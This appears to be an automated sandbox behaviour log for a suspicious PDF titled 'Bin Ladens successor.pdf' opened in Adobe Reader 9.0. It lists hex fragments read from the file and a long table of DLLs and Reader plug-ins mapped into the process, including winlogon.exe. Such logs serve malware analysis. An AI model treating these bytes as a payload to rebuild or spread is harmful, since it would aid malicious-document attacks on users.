C:\Bin Ladens successor.pdf	none	1024	91 F3 11 91 F2 1D D3 F3 16 19 D3 4B 99 E1 9F AF 76 ED ED ED E1 B7 B6 6E 1C 91 EA 52 6F 1B 98 96 17 76 ED ED ED F9 10 A2 2F 1D AC D2 9B 57 FE 99 D0 D3 FA 1A 99 D8 91 F2 1D D3 FB 04 D3 F2 10 91 F3 11 78 02 19 D3 4B 99 E1 9F AF 32 ED ED ED E1 B7 B6 6E 1C 91 EA 52 6F 1B 98 96 17 32 ED ED ED F9 10 A2 2F	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	ED ED 4B 4B 9F 97 76 F8 ED ED 9F 5F F6 42 7A 12 12 52 16 ED 67 1E ED 67 1A FA BB 1E 12 12 97 D2 1D 96 4F 13 12 12 9F 57 F2 41 42 9F 57 E2 42 7A 17 12 12 32 ED 67 FE D5 57 F2 16 12 12 12 ED 07 62 63 12 02 97 D2 1D 96 25 13 12 12 99 57 E2 52 42 FA 38 3A 12 12 99 EA 4B 29 E9 1D 96 30 13 12 12 99 57 E2	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	66 34 41 9F 97 E6 EF ED ED 7A 32 87 10 02 42 ED 07 66 62 12 02 41 9F 97 E6 EF ED ED 7A 0A 81 10 02 42 ED 07 66 62 12 02 44 9F 97 E6 EF ED ED 41 42 FA 2A 36 12 12 9F 97 E6 EF ED ED 42 78 10 ED 27 1A 83 10 02 45 FA 28 E9 ED ED 91 D6 0E 97 D2 66 5E 9F 97 E6 EF ED ED 97 D2 67 16 21 E4 F9 24 9F 97 E6 EF	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	96 B7 B7 B7 7A 82 82 12 02 42 B7 FA AE 32 12 12 91 D6 0A 2B 4F E2 D4 57 EE 10 9B 4F FE AD 11 52 12 92 67 14 45 FA 68 30 12 12 99 67 E2 9F 5F FE 43 9F 5F DA 99 14 41 43 41 44 ED 42 2E 29 D1 6F 1E 7A 8A 82 12 02 44 42 FA 77 30 12 12 2B 4F FE 67 14 45 FA 5E 30 12 12 99 57 FE 9F 47 AA 41 40 99 1A 78 13	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	9F 97 9E EF ED ED 44 42 FA 51 0F 12 12 9A 0A 99 57 1A 4B 99 12 4B 29 57 1E 67 30 2B 4F 02 66 1E 9F 97 9E EF ED ED 42 ED 67 02 ED C5 2B 4F 06 66 1E 9F 97 9E E9 ED ED 42 ED 67 06 ED C5 ED 57 EE 99 57 EE 29 57 EA 1D 90 24 ED ED ED ED 67 E6 ED 07 0A 58 10 02 ED 67 E2 F9 13 45 ED 07 6A 62 12 02 4D 4C 49	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	9F 97 AE EF ED ED 78 ED 42 44 44 ED 07 5E 62 12 02 99 57 E6 42 9F 97 AE E1 ED ED 42 ED 07 A2 62 12 02 9F 97 AE E5 ED ED 42 ED 07 AE 62 12 02 9F 56 12 13 99 2F 72 63 12 02 42 9F 97 AE E5 ED ED 42 99 57 EA 78 39 ED 62 1A ED C5 9F 97 AE E1 ED ED 42 ED 07 AE 62 12 02 9F 56 12 13 42 9F 97 AE E1 ED ED 42	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	91 D2 11 36 EE FA 94 06 12 12 99 D6 45 9B 57 E6 42 74 9B 22 9F 97 AE EF ED ED 78 ED 42 44 44 ED 07 5E 62 12 02 99 57 E6 42 9F 97 AE E1 ED ED 42 ED 07 A2 62 12 02 9F 97 AE E5 ED ED 42 ED 07 AE 62 12 02 9F 56 12 13 99 2F 72 63 12 02 42 9F 97 AE E5 ED ED 42 99 57 EA 78 39 ED 62 1A ED C5 9F 97 AE E1 ED	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	13 12 12 12 49 4B 4B D1 47 99 FE 43 91 2F 5E 9C 10 02 12 41 44 45 99 E3 67 17 FA 2B EF ED ED 99 57 1E 9F 5A 0D 99 57 1A D3 FB 17 9B 1C 99 02 9B 44 16 99 42 16 9B 44 1A 99 42 1A 9B 44 1E 99 42 1E 91 FB 16 9B 44 02 1D 96 7B 13 12 12 5B 5B 1D 96 CD 12 12 12 5B 5B 1D 97 D1 13 12 12 99 5A 02 AD 36 48 10	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	DB D3 F8 1A 21 26 9F 36 40 10 02 21 4A EA 1D A4 D8 99 C1 21 26 9F 36 5C 10 02 1D A4 5F EA D3 F8 02 21 26 9F 36 58 10 02 1D A4 C0 21 62 EE 99 DC 9B 67 FA D3 FB 0A 99 1E 9F 36 44 10 02 21 1E 87 36 40 10 02 99 47 F2 D3 F8 1A 1D A4 C0 21 1E 87 36 5C 10 02 1D A4 47 CE 21 1E 87 36 58 10 02 21 1A 99 C3 99	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	C3 D3 F8 02 21 62 EE 1D A4 C0 99 EC 9B 67 FA D3 FD 0A 99 2E AF 36 44 10 02 21 2E 87 36 40 10 02 99 47 F2 D3 F8 1A 1D A4 C0 21 2E 87 36 5C 10 02 1D A4 C1 21 2E 87 36 58 10 02 99 C4 D3 F8 02 21 2A 9B 6F FE 1D A4 E8 99 C3 99 2E AF 36 40 10 02 D3 F8 1A 1D A4 C0 21 2E 87 36 5C 10 02 99 C1 D3 F8 0A D3 F9	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	9B 6F FE 99 2E 9F 36 40 10 02 99 5F CE 21 2E 8F 36 5C 10 02 D3 FB 0A 21 2E 9F 36 44 10 02 1D A4 5F F2 21 2E 9F 36 58 10 02 21 6A 16 9B 6F E2 99 DC 99 67 F2 D3 FB 1A 1D A4 DB D3 FC 0A 99 0E 9F 36 5C 10 02 99 5F CE 21 0E A7 36 44 10 02 91 D2 02 D3 FB 02 1D A4 DB 21 0E 9F 36 40 10 02 1D A4 D8 D3 F8 0A	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	FB 02 1D A4 DB 21 2E 9F 5E 61 10 02 1D A4 D9 D3 F9 0A 21 2E 9F 5E 79 10 02 99 5F F2 99 0E 8F 5E 65 10 02 D3 FB 02 1D A4 DB 21 6A 1A 21 0E 9F 5E 61 10 02 99 5F CE D3 FB 1A 1D A4 DB 21 0E 9F 5E 7D 10 02 1D A4 D8 21 0E 9F 5E 79 10 02 99 5F E2 21 4A 1E 99 57 1E 9B 6A 1A 9B 22 4D 9B 4A 1E 4C 9B 5A 16 49	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	12 02 ED 37 DE 62 12 02 ED 37 D6 62 12 02 44 99 E3 FA 08 12 12 12 E4 56 36 1A 13 66 15 44 FA A7 EE ED ED 4B 99 D4 4C D0 16 12 ED 37 06 63 12 02 ED 37 0E 63 12 02 DE DE 9F 5F F6 FB 41 F2 ED ED AA 42 60 12 02 FB F2 EE ED ED DE DE 9F 5F F2 FB 2D F2 ED ED AA 6A 60 12 02 FB DE EE ED ED DE DE 9F 5F E2 FB	success or wait	1	4FE0203

Section Activities:

+ Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	unknown	7C800000	1007616	own pid	read write	success or wait	1
none	query and write and read and execute and extend size	reserve	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	unknown	270000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	unknown	290000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	unknown	2E0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	unknown	330000	24576	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey00000409	read	unknown	330000	24576	own pid	readonly	object name not found	1
\NLS\NlsSectionSortkey00000409	read	unknown	330000	24576	own pid	readonly	object name not found	1
\KnownDlls\USER32.dll	write and read and execute	unknown	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	unknown	77F10000	299008	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	unknown	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	unknown	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	unknown	77FE0000	69632	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	unknown	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	unknown	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	unknown	77F60000	483328	own pid	read write	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcp80.dll	query and write and read and execute	image	7C420000	552960	own pid	read write	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcr80.dll	query and write and read and execute	image	78130000	634880	own pid	read write	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	340000	110592	own pid	execute	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	340000	110592	own pid	execute	success or wait	1
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	unknown	370000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	940000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	940000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	390000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	390000	4096	own pid	readonly	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	read	commit	390000	4096	own pid	readonly	success or wait	1
C:\WINDOWS\system32\rpcss.dll	write and read and execute	commit	20C0000	401408	own pid	execute	success or wait	1
C:\WINDOWS\system32\msctf.dll	write and read and execute	commit	20C0000	299008	own pid	execute	success or wait	1
C:\WINDOWS\system32\msctf.dll	query and write and read and execute	image	74720000	311296	own pid	read write	success or wait	1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500	query and write and read	commit	74720000	311296	own pid	read write	object name exists	1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500	query and write and read and execute and extend size	unknown	20D0000	262144	own pid	read write	success or wait	1
C:\WINDOWS\system32\msctfime.ime	write and read and execute	commit	2110000	180224	own pid	execute	success or wait	1
C:\WINDOWS\system32\msctfime.ime	query and read	commit	2110000	180224	own pid	readonly	success or wait	1
C:\WINDOWS\system32\msctfime.ime	write and read and execute	commit	2110000	180224	own pid	execute	success or wait	1
C:\WINDOWS\system32\msctfime.ime	query and read	commit	2110000	180224	own pid	readonly	success or wait	1
\BaseNamedObjects\ShimSharedMemory	write	unknown	2110000	57344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msctfime.ime	write and read and execute	commit	2120000	180224	own pid	execute	success or wait	1
C:\WINDOWS\system32\msctfime.ime	query and write and read and execute	image	755C0000	188416	own pid	read write	success or wait	1
C:\WINDOWS\system32\ieframe.dll	write and read and execute	commit	2120000	11083776	own pid	execute	success or wait	1
C:\WINDOWS\system32\ieframe.dll	query and write and read and execute	image	3E1C0000	11096064	own pid	read write	success or wait	1
C:\WINDOWS\system32\en-us\ieframe.dll.mui	query and read	commit	2130000	1241088	own pid	write copy	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\RdLang32.DEU	write and read and execute	commit	2120000	7573504	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\RdLang32.DEU	query and read	commit	2120000	7573504	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\RdLang32.DEU	write and read and execute	commit	2120000	7573504	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\RdLang32.DEU	query and read	commit	2120000	7573504	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\RdLang32.DEU	write and read and execute	commit	2120000	7573504	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\RdLang32.DEU	query and write and read and execute	image	10000000	7573504	own pid	read write	success or wait	1
\KnownDlls\SETUPAPI.dll	write and read and execute	unknown	10000000	7573504	own pid	read write	object name not found	1
C:\WINDOWS\system32\setupapi.dll	query and write and read and execute	image	77920000	995328	own pid	read write	success or wait	1
C:\WINDOWS\system32\winlogon.exe	write and read and execute	commit	2430000	507904	own pid	execute	success or wait	1
\KnownDlls\xpsp2res.dll	write and read and execute	unknown	2430000	507904	own pid	execute	object name not found	1
C:\WINDOWS\system32\xpsp2res.dll	query and write and read and execute	image	2430000	2904064	own pid	read write	conflicting addresses	1
\KnownDlls\UxTheme.dll	write and read and execute	unknown	2430000	2904064	own pid	read write	object name not found	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Annots.api	write and read and execute	commit	2940000	4857856	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Annots.api	query and write and read and execute	image	22100000	4890624	own pid	read write	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Annots.DEU	write and read and execute	commit	2950000	1712128	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Annots.DEU	query and read	commit	2950000	1712128	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Annots.DEU	write and read and execute	commit	2950000	1712128	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Annots.DEU	query and read	commit	2950000	1712128	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Annots.DEU	write and read and execute	commit	2950000	1712128	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Annots.DEU	query and write and read and execute	image	2950000	1712128	own pid	read write	conflicting addresses	1
C:\WINDOWS\system32\ieframe.dll	write and read and execute	commit	2B10000	11083776	own pid	execute	success or wait	1
C:\WINDOWS\system32\ieframe.dll	query and write and read and execute	image	3E1C0000	11096064	own pid	read write	success or wait	1
C:\WINDOWS\system32\en-us\ieframe.dll.mui	query and read	commit	2B20000	1241088	own pid	write copy	success or wait	1
C:\WINDOWS\system32\ieframe.dll	write and read and execute	commit	2B10000	11083776	own pid	execute	success or wait	1
C:\WINDOWS\system32\ieframe.dll	query and write and read and execute	image	3E1C0000	11096064	own pid	read write	success or wait	1
C:\WINDOWS\system32\en-us\ieframe.dll.mui	query and read	commit	2B20000	1241088	own pid	write copy	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl	write and read and execute	commit	2B10000	1392640	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl	query and read	commit	2B10000	1392640	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl	write and read and execute	commit	2B10000	1392640	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl	query and write and read and execute	image	4000000	1413120	own pid	read write	success or wait	1
\KnownDlls\MSIMG32.dll	write and read and execute	unknown	4000000	1413120	own pid	read write	object name not found	1
C:\WINDOWS\system32\msimg32.dll	query and write and read and execute	image	76380000	20480	own pid	read write	success or wait	1
\KnownDlls\CLBCATQ.DLL	write and read and execute	unknown	76380000	20480	own pid	read write	object name not found	1
C:\WINDOWS\system32\clbcatq.dll	query and write and read and execute	image	76FD0000	520192	own pid	read write	success or wait	1
\KnownDlls\COMRes.dll	write and read and execute	unknown	76FD0000	520192	own pid	read write	object name not found	1
C:\WINDOWS\system32\comres.dll	query and write and read and execute	image	77050000	806912	own pid	read write	success or wait	1
C:\WINDOWS\system32\oleacc.dll	write and read and execute	commit	2B40000	163840	own pid	execute	success or wait	1
C:\WINDOWS\system32\oleacc.dll	query and write and read and execute	image	74C80000	180224	own pid	read write	success or wait	1
\KnownDlls\MSVCP60.dll	write and read and execute	unknown	74C80000	180224	own pid	read write	object name not found	1
C:\WINDOWS\system32\msvcp60.dll	query and write and read and execute	image	76080000	413696	own pid	read write	success or wait	1
C:\WINDOWS\system32\oleaccrc.dll	query and read	commit	2B40000	20480	own pid	readonly	success or wait	1
C:\WINDOWS\system32\oleacc.dll	query and read	commit	2B50000	12288	own pid	readonly	success or wait	1
\KnownDlls\Msftedit.dll	write and read and execute	unknown	2B50000	12288	own pid	readonly	object name not found	1
C:\WINDOWS\system32\msftedit.dll	query and write and read and execute	image	4B400000	548864	own pid	read write	success or wait	1
C:\WINDOWS\system32\msimtf.dll	write and read and execute	commit	3020000	159744	own pid	execute	success or wait	1
C:\WINDOWS\system32\msimtf.dll	write and read and execute	commit	3020000	159744	own pid	execute	success or wait	1
C:\WINDOWS\system32\msimtf.dll	write and read and execute	commit	3020000	159744	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api	write and read and execute	commit	3020000	10436608	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api	query and write and read and execute	image	20800000	11550720	own pid	read write	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Acroform.DEU	write and read and execute	commit	3030000	999424	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Acroform.DEU	query and read	commit	3030000	999424	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Acroform.DEU	write and read and execute	commit	3030000	999424	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Acroform.DEU	query and read	commit	3030000	999424	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Acroform.DEU	write and read and execute	commit	3030000	999424	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Acroform.DEU	query and write and read and execute	image	3030000	999424	own pid	read write	conflicting addresses	1
C:\WINDOWS\system32\ieframe.dll	write and read and execute	commit	3140000	11083776	own pid	execute	success or wait	1
C:\WINDOWS\system32\ieframe.dll	query and write and read and execute	image	3E1C0000	11096064	own pid	read write	success or wait	1
C:\WINDOWS\system32\en-us\ieframe.dll.mui	query and read	commit	3150000	1241088	own pid	write copy	success or wait	1
C:\WINDOWS\system32\ieframe.dll	write and read and execute	commit	3140000	11083776	own pid	execute	success or wait	1
C:\WINDOWS\system32\ieframe.dll	query and write and read and execute	image	3E1C0000	11096064	own pid	read write	success or wait	1
C:\WINDOWS\system32\en-us\ieframe.dll.mui	query and read	commit	3150000	1241088	own pid	write copy	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\EScript.api	write and read and execute	commit	3140000	1523712	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\EScript.api	query and write and read and execute	image	23800000	1544192	own pid	read write	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Escript.deu	write and read and execute	commit	3150000	106496	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Escript.deu	query and read	commit	3150000	106496	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Escript.deu	write and read and execute	commit	3150000	106496	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Escript.deu	query and read	commit	3150000	106496	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Escript.deu	write and read and execute	commit	3150000	106496	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Escript.deu	query and write and read and execute	image	3150000	106496	own pid	read write	conflicting addresses	1
C:\WINDOWS\system32\ieframe.dll	write and read and execute	commit	31C0000	11083776	own pid	execute	success or wait	1
C:\WINDOWS\system32\ieframe.dll	query and write and read and execute	image	3E1C0000	11096064	own pid	read write	success or wait	1
C:\WINDOWS\system32\en-us\ieframe.dll.mui	query and read	commit	31D0000	1241088	own pid	write copy	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DigSig.api	write and read and execute	commit	3CD0000	1282048	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DigSig.api	query and write and read and execute	image	23000000	1298432	own pid	read write	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DigSig.DEU	write and read and execute	commit	31E0000	274432	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DigSig.DEU	query and read	commit	31E0000	274432	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DigSig.DEU	write and read and execute	commit	31E0000	274432	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DigSig.DEU	query and read	commit	31E0000	274432	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DigSig.DEU	write and read and execute	commit	31E0000	274432	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DigSig.DEU	query and write and read and execute	image	31E0000	274432	own pid	read write	conflicting addresses	1
\KnownDlls\AXE8SharedExpat.dll	write and read and execute	unknown	31E0000	274432	own pid	read write	object name not found	1
C:\Program Files\Adobe\Reader 9.0\Reader\AXE8SharedExpat.dll	query and write and read and execute	image	3240000	188416	own pid	read write	conflicting addresses	1
\KnownDlls\AXSLE.dll	write and read and execute	unknown	3240000	188416	own pid	read write	object name not found	1
C:\Program Files\Adobe\Reader 9.0\Reader\AXSLE.dll	query and write and read and execute	image	3CD0000	622592	own pid	read write	conflicting addresses	1
C:\Program Files\Adobe\Reader 9.0\Reader\cryptocme2.dll	write and read and execute	commit	3D70000	401408	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\cryptocme2.dll	query and write and read and execute	image	3D70000	610304	own pid	read write	conflicting addresses	1
C:\Program Files\Adobe\Reader 9.0\Reader\ccme_base.dll	write and read and execute	commit	3E10000	479232	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\ccme_base.dll	query and write and read and execute	image	3E10000	483328	own pid	read write	conflicting addresses	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\accessibility.DEU	write and read and execute	commit	3E90000	81920	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\accessibility.DEU	query and read	commit	3E90000	81920	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api	write and read and execute	commit	3E90000	442368	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api	query and read	commit	3E90000	442368	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api	write and read and execute	commit	3E90000	442368	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api	query and read	commit	3E90000	442368	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Checkers.DEU	write and read and execute	commit	3E90000	192512	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Checkers.DEU	query and read	commit	3E90000	192512	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api	write and read and execute	commit	3E90000	839680	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api	query and read	commit	3E90000	839680	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api	write and read and execute	commit	3E90000	839680	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api	query and read	commit	3E90000	839680	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DVA.DEU	write and read and execute	commit	32D0000	20480	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DVA.DEU	query and read	commit	32D0000	20480	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DVA.api	write and read and execute	commit	3E90000	135168	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DVA.api	query and read	commit	3E90000	135168	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DVA.api	write and read and execute	commit	3E90000	135168	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DVA.api	query and read	commit	3E90000	135168	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\eBook.DEU	write and read and execute	commit	32D0000	24576	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\eBook.DEU	query and read	commit	32D0000	24576	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\eBook.api	write and read and execute	commit	32D0000	57344	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\eBook.api	query and read	commit	32D0000	57344	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\eBook.api	write and read and execute	commit	32D0000	57344	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\eBook.api	query and read	commit	32D0000	57344	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\IA32.DEU	write and read and execute	commit	32D0000	4096	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\IA32.DEU	query and read	commit	32D0000	4096	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\IA32.api	write and read and execute	commit	3E90000	94208	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\IA32.api	query and read	commit	3E90000	94208	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\IA32.api	write and read and execute	commit	3E90000	94208	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\IA32.api	query and read	commit	3E90000	94208	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Hls.deu	write and read and execute	commit	3E90000	16384	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Hls.deu	query and read	commit	3E90000	16384	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\HLS.api	write and read and execute	commit	3E90000	53248	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\HLS.api	query and read	commit	3E90000	53248	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\HLS.api	write and read and execute	commit	3E90000	53248	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\HLS.api	query and read	commit	3E90000	53248	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\makeaccessible.DEU	write and read and execute	commit	3E90000	90112	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\makeaccessible.DEU	query and read	commit	3E90000	90112	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api	write and read and execute	commit	4160000	2301952	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api	query and read	commit	4160000	2301952	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api	write and read and execute	commit	4160000	2301952	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api	query and read	commit	4160000	2301952	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.DEU	write and read and execute	commit	3E90000	155648	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.DEU	query and read	commit	3E90000	155648	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api	write and read and execute	commit	3E90000	1409024	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api	query and read	commit	3E90000	1409024	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api	write and read and execute	commit	3E90000	1409024	own pid	execute	success or wait	1
